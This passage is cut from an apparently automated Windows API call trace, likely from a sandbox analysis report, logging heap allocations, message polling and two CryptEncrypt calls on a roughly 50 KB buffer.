wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0255.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0255.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0255.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0255.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0255.898] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0255.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0255.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51a48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0255.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0255.899] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0255.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0255.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e540f8 [0255.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0255.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0255.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0255.900] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xc6f1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xc6f8) returned 1 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0255.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0255.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0255.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0255.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0255.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0255.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0255.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0255.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0255.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0255.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0255.904] CharLowerBuffW (in: lpsz="byte[50936]", cchLength=0xb | out: lpsz="byte[50936]") returned 0xb [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0255.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0255.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0255.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0255.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0255.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0255.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0255.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0255.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0255.911] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.911] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0255.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0255.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0255.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0255.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0255.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0255.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0255.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51a90 [0255.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51a90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0255.913] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f39510*, pdwDataLen=0x8cef60*=0xc6f1, dwBufLen=0xc6f8 | out: pbData=0x2f39510*, pdwDataLen=0x8cef60*=0xc6f8) returned 1 [0255.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0255.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0255.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0255.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0255.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0255.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0255.917] RtlAllocateHeap 